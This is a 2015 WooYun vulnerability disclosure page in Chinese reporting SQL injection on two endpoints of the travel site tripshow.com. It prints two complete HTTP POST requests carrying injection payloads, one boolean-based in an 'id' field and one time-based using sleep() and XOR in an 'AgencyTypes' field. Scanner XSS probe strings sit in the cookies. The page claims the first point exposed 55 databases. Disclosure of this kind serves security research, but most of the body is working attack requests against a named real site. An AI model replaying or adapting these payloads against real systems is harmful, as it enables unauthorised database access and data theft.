当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142115

漏洞标题:途秀网某站SQL注入打包

相关厂商:途秀网

漏洞作者: miracle

提交时间:2015-09-19 09:02

修复时间:2015-11-03 09:04

公开时间:2015-11-03 09:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

#1

POST /weiboapp/73/processor HTTP/1.1
Content-Length: 83
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://tripshow.com:80/
Cookie: PHPSESSID=5gdueeiomurk8pds0rab7og981; backurl=%2Fpictures%2Fshow%2Fnull; callbackurl=%2Fweiboapp%2Flogin%2Fchk; newyear2014_from=http%3A%2F%2Ftripshow.com%2F; todaysidck=55fa83900f447; referer=http%3A%2F%2Ftripshow.com%2F5343689283%2Fmyself; weiboapp_login_backurl=%2Fweiboapp%2F88%2F%3Fact%3D; __utmt=1; __utma=268593204.163940433.1442481527.1442481527.1442481527.1; __utmb=268593204.7.10.1442481527; __utmc=268593204; __utmz=268593204.1442481527.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _pk_ref.1.07eb=%5B%22%22%2C%22%22%2C1442481529%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1.07eb=f79d3e775f458bcc.1442481529.1.1442484501.1442481529.; _pk_ses.1.07eb=*; _ga=GA1.2.962798704.1442481533; _gat=1; 2014_show=question; Hm_lvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442482897,1442483323,1442484256,1442484749; Hm_lpvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442484749; HMACCOUNT=F1B3AFC580D0BFE1; 2014_goto=http%3A//tripshow.com/campaign/newyear/activity/1756852%23to6
Host: tripshow.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=get_imglist&id=756505%20AND%203*2*1%3d6%20AND%20187%3d187&img_types=2&page=2


#2

POST /products/brandpages/open HTTP/1.1
Content-Length: 262
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://tripshow.com:80/
Cookie: PHPSESSID=5gdueeiomurk8pds0rab7og981; backurl=%2Fpictures%2Fshow%2Fnull; callbackurl=%2Fweiboapp%2Flogin%2Fchk; newyear2014_from=http%3A%2F%2Ftripshow.com%2F; todaysidck=55fa83900f447; referer=http%3A%2F%2Ftripshow.com%2F5343689283%2Fmyself; weiboapp_login_backurl=%2Fweiboapp%2F88%2F%3Fact%3D; __utmt=1; __utma=268593204.163940433.1442481527.1442481527.1442481527.1; __utmb=268593204.7.10.1442481527; __utmc=268593204; __utmz=268593204.1442481527.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _pk_ref.1.07eb=%5B%22%22%2C%22%22%2C1442481529%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1.07eb=f79d3e775f458bcc.1442481529.1.1442484501.1442481529.; _pk_ses.1.07eb=*; _ga=GA1.2.962798704.1442481533; _gat=1; 2014_show=question; Hm_lvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442482897,1442483323,1442484256,1442484749; Hm_lpvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442484749; HMACCOUNT=F1B3AFC580D0BFE1; 2014_goto=http%3A//tripshow.com/campaign/newyear/activity/1756852%23to6
Host: tripshow.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
address=3137%20Laguna%20Street&AgencyTypes=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&description=1&email=sample%40email.tst&location=1&tel=555-666-0606&url=1&VersionID=1

漏洞证明:

跑第一处来进行证明:55个库,

2.png

修复方案:

版权声明:转载请注明来源 miracle@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝